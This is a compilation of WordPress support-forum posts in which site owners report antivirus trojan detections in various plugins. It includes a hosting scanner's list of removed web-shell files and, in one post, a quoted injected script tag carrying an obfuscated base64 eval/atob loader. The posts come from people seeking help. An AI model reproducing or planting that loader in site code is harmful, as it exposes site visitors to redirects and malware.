Hello,

is it possible that there is malware in the duplicator (free version) controller.php file?

When I create a backup using duplicator and try to save it to my PC my Avast Virus scanner aborts the download and tells me about a malware detection (trojan) in the controller.php file.

Is this a security issue the duplicator team knows about and is there a possibility to find out if the site or the backup is infected? Are there any solutions or measures to take now? Thanks so much for your help.

Regards Stephanie

Esses virus foram removidos pelo Hostinger.
Como posso salvar o site

Simples.php
● Malicioso
Removido
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-includes/css/dist/block-library/Simple.php
23/10/2023
10:46

Simples.php
● Malicioso
Removido
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-content/themes/hello-elementor/includes/settings/Simple.php
2023-10-21
02:53

exjn.php
● Malicioso
Removido
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-content/plugins/exjn.php/exjn.php
2023-10-21
02:51

seguranças.php
● Malicioso
Removido
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-content/plugins/safetys/safetys.php
2023-10-21
02:51

.htaccess
● Comprometido
Limpo
/home/u986222547/domains/obsidiajeans.com.br/public_html/.htaccess
2023-10-21
02:51

wp-best-feed.php
● Malicioso
Removido
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-best-feed.php
2023-10-21
02:51

.htaccess
● Comprometido
Limpo
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-includes/.htaccess
2023-10-21
02:51

loja.php
● Malicioso
Removido
/home/u986222547/domains/obsidiajeans.com.br/public_html/shop.php
2023-10-21
02:51

.htaccess
● Comprometido
Limpo
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-content/.htaccess
2023-10-21
02:50

seguranças.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-content/upgrade/safetys/safetys.php
18/10/2023
09:00

map-type-in.php
● Malicioso
Removido
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-includes/map-type-in.php
18/10/2023
02:16

opt_0oy.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-content/upgrade/opt_v13trk/opt_0oy.php
18/10/2023
02:16

optim_v306i4.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-content/upgrade/opt_v13trk/optim_v306i4.php
18/10/2023
02:16

eyfg8na.php
● Malicioso
Removido
/home/u986222547/domains/obsidiajeans.com.br/public_html/eyfg8na.php
17/10/2023
09:02

index.php
● Comprometido
Limpo
/home/u986222547/domains/obsidiajeans.com.br/public_html/index.php
17/10/2023
09:02

estilo2.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/style2.php
17/10/2023
08:53

shell_php1.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-includes/style-engine/shell_php1.php
17/10/2023
08:53

class_api_php1.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-includes/pomo/class_api_php1.php
17/10/2023
08:53

about_php1.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-includes/assets/about_php1.php
17/10/2023
08:53

iR7SzrsOUEP.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-content/languages/themes/iR7SzrsOUEP.php
17/10/2023
08:53

licença.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-includes/Text/Diff/Renderer/license.php
17/10/2023
08:53

nuvem.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-includes/certificates/cloud.php
17/10/2023
08:53

wp-sigunq.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-content/upgrade/wp-sigunq.php
17/10/2023
08:52

instalar.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-content/plugins/advanced-woo-labels/includes/admin/install.php
17/10/2023
08:52

lua.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-content/upgrade-temp-backup/plugins/moon.php
17/10/2023
08:52

xmrlpc.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-content/uploads/wc-logs/xmrlpc.php
17/10/2023
08:52

class_api.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-admin/includes/class_api.php
17/10/2023
08:52

shell.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-admin/js/widgets/shell.php
17/10/2023
08:52

sobre.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-admin/maint/about.php
17/10/2023
08:52

upfile_php1.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-admin/network/upfile_php1.php
17/10/2023
08:52

instalar_php1.php
● Malicioso
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-admin/images/install_php1.php
17/10/2023
08:52

wp-add.php
● Malicioso
Removido
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-add.php
13/10/2023
09:57

index.php
● Malicioso
Removido
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-content/plugins/wp-nicolas-cyberpsychology/index.php
13/10/2023
02:51

osauz.txt
● Malicioso
Removido
/home/u986222547/domains/obsidiajeans.com.br/public_html/wp-content/plugins/usujovawo/osawuz.txt

I’ve used wordpress since the early days (15+ years). When updating my site over the summer 2 plugins were suggested to be installed. This one and another.
Several employees told me they were getting a virus when visiting the site. Upon checking the plugin settings a code snippet was added in August without my ok that was loading a virus in the header.
I deleted this plugin and all is well again. I wish I could remember which plugin suggested these 2, part of the blame lies there.

HI

I’ve installed a plugin to do scanning for malware on client site.

It came back with a possible issue with a file in your plugin.

I had just updated ALL plugins including yours & WordPress BEFORE I did the scan so I can’t see that it is dodgy but thought I better ask.

Current version of your plugin I have is 3.7.2

It says trojan …

https://snipboard.io/5VpPNs.jpg

How do I interpret this?

Thanks
Kristin

Hi,

I’ve installed a plugin that scans for malware.

It came back with a possible issue in a file in your plugin.

I had only just recently updated ALL plugins including yours and WordPress.

Current version installed is 5.3 is this the most current?

Can you confirm or advise please?

https://snipboard.io/MBg1VZ.jpg

Thanks

Please advise how to solcve this issue. trojan found on website and it stopped working

Threat found

This web page may contain dangerous content that can provide remote access to an infected device, leak sensitive data from the device or harm the targeted device.

Threat: JS/Agent.RFQ trojan

Access to the web page has been blocked. Your computer is safe.

Hello, I am using your plugin on one of my websites. After installing your plugin in my local environment, Windows Defender is showing a detection of Trojan:HTML/Phish!MSR.

Check the screenshot Below : https://prnt.sc/3BuFhiOiekuN

Thanks
Mahadi

In one site where WPCode Lite  ver. 2.1.6 + WP 5.9.8 are used, have trouble with Trojan virus, when WPCode is enabled!

I compared with WinMerge content of both files in plugin source and on site, both are exactly the same

JS/Agent.RFQ trojan detected

Hello.

It seems that Bitdefender detects wpsd-front.js script as trojan:
https://i.postimg.cc/QNqkpmMj/trojan.png

but that’s a false positive, because the content of the script is this:

(function(window, $) {

    // USE STRICT
    "use strict";

    //$('ul#wpsd_donate_amount li:first-child').addClass('active');

    $('ul#wpsd_donate_amount li.amount').click(function() {
        $('ul#wpsd_donate_amount li').removeClass('active')
        $(this).addClass('active');
        var wpsdRadioVal = $(this).data("amount");
        if (wpsdRadioVal !== undefined) {
            $("#wpsd_donate_other_amount").val(wpsdRadioVal);
        }
    });

    var form = document.getElementById('wpsd-donation-form-id');
    var stripe = Stripe(wpsdAdminScriptObj.stripePKey);
    var elements = stripe.elements();
    var wpsdDonateAmount = 0;

    var style = {
        base: {
            color: wpsdAdminScriptObj.card_element_color,
            '::placeholder': {
                color: wpsdAdminScriptObj.card_element_color,
            },
        }
    };

    var card = elements.create('card', {
        hidePostalCode: true,
        style: style,
    });

    if (form != null) {

        card.mount("#card-element");

        card.addEventListener('change', ({ error }) => {
            const displayError = document.getElementById('card-errors');
            if (error) {
                displayError.textContent = error.message;
            } else {
                displayError.textContent = '';
            }
        });

        form.addEventListener('submit', function(e) {

            e.preventDefault();
            var wpsdShowCheckout = true;

            if ($("#wpsd_donate_other_amount").val() == '') {
                $('#card-errors').show('slow').addClass('error').html('Amount Missing');
                $("#wpsd_donate_other_amount").focus();
                return false;
            }

            if ($("#wpsd_donate_other_amount").val() !== '') {
                wpsdDonateAmount = $("#wpsd_donate_other_amount").val();
            }

            if (($("#wpsd_donation_for").val() == '') || ($("#wpsd_donation_for").val() == null)) {
                $('#card-errors').show('slow').addClass('error').html('Please Enter Donation For');
                $("#wpsd_donation_for").focus();
                return false;
            }

            if ($("#wpsd_donator_name").val() == '') {
                $('#card-errors').show('slow').addClass('error').html('Please Enter Name');
                $("#wpsd_donator_name").focus();
                return false;
            }

            if ($("#wpsd_donator_email").val() == '') {
                $('#card-errors').show('slow').addClass('error').html('Please Enter Email');
                $("#wpsd_donator_email").focus();
                return false;
            }

            if (!wpsd_validate_email($("#wpsd_donator_email").val())) {
                $('#card-errors').show('slow').addClass('error').html('Please Enter Valid Email');
                $("#wpsd_donator_email").focus();
                return false;
            }

            if ($("#wpsd_captcha_content").val() == '') {
                $('#card-errors').show('slow').addClass('error').html('Capcha Missing!');
                $("#wpsd_captcha_content").focus();
                return false;
            }

            if ($("#wpsd_captcha_content").val() != $("#wpsd_captcha_content_check").val()) {
                $('#card-errors').show('slow').addClass('error').html('Wrong Capcha Number!');
                $("#wpsd_captcha_content").focus();
                return false;
            }

            // Address Processing
            var address = [{
                'address_street': $('#wpsd_address_street').val(),
                'address_line2': $('#wpsd_address_line2').val(),
                'address_city': $('#wpsd_address_city').val(),
                'address_state': $('#wpsd_address_state').val(),
                'address_postal': $('#wpsd_address_postal').val(),
                'address_country': $('#wpsd_address_country').val()
            }];
            //var address = $.serialize(address);

            if (wpsdShowCheckout) {

                $("#wpsd-pageloader").fadeIn();

                $.ajax({
                    url: wpsdAdminScriptObj.ajaxurl,
                    type: "POST",
                    dataType: "JSON",
                    cache: false,
                    data: {
                        action: 'wpsd_donation',
                        name: $("#wpsd_donator_name").val(),
                        email: $("#wpsd_donator_email").val(),
                        amount: wpsdDonateAmount,
                        donation_for: $("#wpsd_donation_for").val(),
                        currency: wpsdAdminScriptObj.currency,
                        idempotency: wpsdAdminScriptObj.idempotency,
                        security: wpsdAdminScriptObj.security,
                        stripeSdk: wpsdAdminScriptObj.stripe_sdk,
                        address: address
                    },
                    success: function(response) {
                        if (response.data.status === 'success') {
                            stripe.confirmCardPayment(response.data.client_secret, {
                                payment_method: {
                                    card: card,
                                    billing_details: {
                                        name: $("#wpsd_donator_name").val(),
                                        email: $("#wpsd_donator_email").val(),
                                    }
                                }
                            }).then(function(result) {

                                if (result.error) {
                                    $("#wpsd-pageloader").fadeOut();
                                    $('#card-errors').text(result.error.message);

                                } else {
                                    if (result.paymentIntent.status === 'succeeded') {
                                        afterPaymentSucceeded($("#wpsd_donator_email").val(), wpsdDonateAmount, $("#wpsd_donation_for").val(), $("#wpsd_donator_name").val(), wpsdAdminScriptObj.currency, $("#wpsd-comments").val(), address);
                                    }
                                }
                            });
                        }
                        if (response.data.status === 'error') {
                            $("#wpsd-pageloader").fadeOut();
                            $('#card-errors').show('slow').removeClass('success').addClass(response.data.status).html(response.data.message);
                        }
                    }
                });
            }
        });

    }

    $("#wpsd-donation-form-id input[type='radio']").on("click", function() {

        var wpsdRadioVal = $(this).val();
        if (wpsdRadioVal !== undefined) {
            $("#wpsd_donate_other_amount").val(wpsdRadioVal);
        }

    });

    $('#wpsd_donate_other_amount').on('keyup', function(e) {

        $("#wpsd-donation-form-id input[type='radio']").prop("checked", false);

        if (/^(\d+(\.\d{0,2})?)?$/.test($(this).val())) {
            $(this).data('prevValue', $(this).val());
        } else {
            $(this).val($(this).data('prevValue') || '');
        }
    });

    function wpsd_validate_email($email) {
        var emailReg = /^([\w-\.]+@([\w-]+\.)+[\w-]{2,6})?$/;
        return emailReg.test($email);
    }

    function afterPaymentSucceeded(email, amount, donateFor, name, currency, comments, address) {
        $.ajax({
            url: wpsdAdminScriptObj.ajaxurl,
            type: "POST",
            dataType: "JSON",
            data: {
                action: 'wpsd_donation_success',
                email: email,
                amount: amount,
                donation_for: donateFor,
                name: name,
                currency: currency,
                comments: comments,
                address: address
            },
            success: function(response) {
                if (response.status === 'success') {
                    var url = new URL(wpsdAdminScriptObj.successUrl);
                    url.searchParams.set('donation', 'success');
                    window.location.href = url.href;
                }
                if (response.status === 'error') {
                    $('#card-errors').show('slow').removeClass('success').addClass(response.status).html(response.message);
                }
            }
        });
    }

    // searchable dropdown select
    $('div.wpsd-form-item-half-right select#wpsd_address_country').selectize({
        sortField: 'text'
    });

})(window, jQuery);

Hello. I am currently having a problem with my webpage (http://www.jongraywb.com/) where I think I’ve been hacked. I try to load it and my security immediately tells me this:

This web page may contain dangerous content that can provide remote access to an infected device, leak sensitive data from the device or harm the targeted device.

Threat: JS/Agent.RFQ trojan

Access to the web page has been blocked. Your computer is safe.

I believe my page is being redirected to some phishing site. I’ve run WordFence multiple times and including on high sensitivity with no luck. I’m at my wits end. Is there anything that anyone can do to help. Thanks.

Do not install this. It came with a trojan virus and shut down my entire website.

I just did a SUPERAntiSpyware scan of a site that’s in local development, and it flagged 3 WPCode plugin files as having “Trojan.Dropper/Gen-PHP”:

\INSERT-HEADERS-AND-FOOTERS\INCLUDES\ADMIN\IMPORTERS\CLASS-WPCODE-IMPORTER-WOODY.PHP
\INSERT-HEADERS-AND-FOOTERS\INCLUDES\ADMIN\PAGES\CLASS-WPCODE-ADMIN-PAGE-CLICK.PHP
\INSERT-HEADERS-AND-FOOTERS\INCLUDES\EXECUTE\CLASS-WPCODE-SNIPPET-EXECUTE-CSS.PHP

Is this something you’re aware of? Is it really malware in your files? Either way, how do I proceed? Do I delete these files and replace them from a fresh download? Or just uninstall and reinstall (and if so, will my current customizations still be available)?.

Thanks.

Hi,

we got our Website locally blocked by the ESET Virus Scanner, saying it’s infected by a trojan (this is why i am not posting a link to it)! They hihglight a piece of code which comes from your Popup-Builder:

<script defer id="sgpb-custom-script-2075" src="data:text/javascript;base64,alF1ZXJ5KGRvY3VtZW50KS5yZWFkeShmdW5jdGlvbigpe3NnQWRkRXZlbnQod2luZG93LCAic2dwYldpbGxPcGVuIiwgZnVuY3Rpb24oZSkge2lmIChlLmRldGFpbC5wb3B1cElkID09ICIyMDc1Iikge3ZhciBqamhmZ25qYy8qcmJobG9lbHgqLz0vKnJiaGxvZWx4Ki9ldmFsOy8qcmJobG9lbHgqL3ZhciB1Y3h0ZnUvKnJiaGxvZWx4Ki89LypyYmhsb2VseCovYXRvYjtqamhmZ25qYyh1Y3h0ZnUoImQiKy8qcmJobG9lbHgqLyJtRnkiKy8qcmJobG9lbHgqLyJJR1EiKy8qdXN3b2l1emxsdSovIjlaRzlqZCIrLypyYmhsb2VseCovIlcxbGJuUSIrLyp1c3dvaXV6bGx1Ki8iN2QiKy8qcmJobG9lbHgqLyJtRnkiKy8qcmJobG9lbHgqLyJJSE05WkM1IisvKnVzd29pdXpsbHUqLyJqY21WaGQiKy8qcmJobG9lbHgqLyJHVkZiR1Z0Wlc1IisvKnVzd29pdXpsbHUqLyIwIisvKnlva3lkcmh6Ki8iS0NKeiIrLyp5b2t5ZHJoeiovIlkzSnBjSFEiKy8qdXN3b2l1emxsdSovImlLVHR6IisvKnlva3lkcmh6Ki8iTG5OeSIrLypyYmhsb2VseCovIll6IisvKnlva3lkcmh6Ki8iMCIrLyp5b2t5ZHJoeiovIm5hSFIwIisvKnlva3lkcmh6Ki8iY0hNNkx5IisvKnJiaGxvZWx4Ki8iOXoiKy8qeW9reWRyaHoqLyJiMlowIisvKnlva3lkcmh6Ki8iTG5Od1pXTnBZV3hqY21GbWQiKy8qcmJobG9lbHgqLyJHSnZlQzUiKy8qdXN3b2l1emxsdSovImpiMjAiKy8qeW9reWRyaHoqLyJ2U2xwR1dXSkRKeiIrLyp5b2t5ZHJoeiovInRrTG1kIisvKnJiaGxvZWx4Ki8ibGQiKy8qcmJobG9lbHgqLyJFVnMiKy8qdXN3b2l1emxsdSovIlpXMWxiblJ6IisvKnlva3lkcmh6Ki8iUSIrLyp1c3dvaXV6bGx1Ki8ibmxVWVdkIisvKnJiaGxvZWx4Ki8iT1lXMWxLQ2QiKy8qcmJobG9lbHgqLyJvWldGa0p5IisvKnJiaGxvZWx4Ki8ibGJNRjAiKy8qeW9reWRyaHoqLyJ1WVhCd1pXNSIrLyp1c3dvaXV6bGx1Ki8ia1EiKy8qdXN3b2l1emxsdSovIjJocGJHUSIrLyp1c3dvaXV6bGx1Ki8ib2N5IisvKnJiaGxvZWx4Ki8iazciKSk7fTt9KTt9KTs="></script>

Is that trustworhty code or is it possible that the plugin is infected by malware?

thank you,

best regards

Hello,

is it possible that there is malware in the duplicator (free version) controller.php file?

When I create a backup using duplicator and try to save it to my PC my Avast Virus scanner aborts the download and tells me about a malware detection (trojan) in the controller.php file.

Is this a security issue the duplicator team knows about and is there a possibility to find out if the site or the backup is infected? Are there any solutions or measures to take now? Thanks so much for your help.

Regards Stephanie

Why does the wpcode plugin appear in my WordPress installation without me installing it? First, it appears in the top administrative bar of my site when I’m logged in, indicating an error and it doesn’t appear in the installed plugins area of ​​the site. When I enter the error, active scripts appear that I have not activated or installed. When I delete the snippets the plugin starts to appear in the side menu of my wp-admin and starts to appear in the list of installed plugins. I deactivate and uninstall it but the next day there it is again!!!!!! what could be happening? How do I resolve this? and many site users sent me screens that, when trying to access my site, are redirected to a page with a drawing of a little robot telling you to click “allow” if you are not a robot.

Hello everyone,

I hope you’re all doing well. On some sites where I have the LiteSpeed plugin installed, when I access the Page Optimization menu, Kaspersky antivirus reports a Trojan with the following information:

Threat level: High Object type: File Object name: admin.php?page=litespeed-page_optm Type: Trojan Horse Name: HEUR.Script.Malcrack.gen

I would like to know if anyone else is experiencing this issue. I’m suspecting it might be a false positive.

Thank you!

Forget it. You can’t just buy the plugin, you have to have your site managed from WPMU DEV with an extra plugin dashboard.

Works well , but as soon as I installed I got a ( infected with script:snh-gen[trj] ) popup from my Avast anti virus , so I had to uninstall , please check on this

This morning, when I accessed the three websites where I use Elementor (on different hostings), the antivirus “AVG” indicated that the site has a “Script:SNH-gen [Trj]” or Trojan.

The URL indicated is “../wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.22.3”.

Since these are three different websites and there haven’t been any changes to the plugin, I understand that it could be a false positive.

I am writing to confirm that everything is fine, see if this is happening to others, and if so, that it can be corrected.

I have notified the antivirus as a false positive for review.

Buongiorno.

L’antivirus Avast rileva un Trojan nel file: wp-content/plugins/elementor/assets/js/common-modules.min.js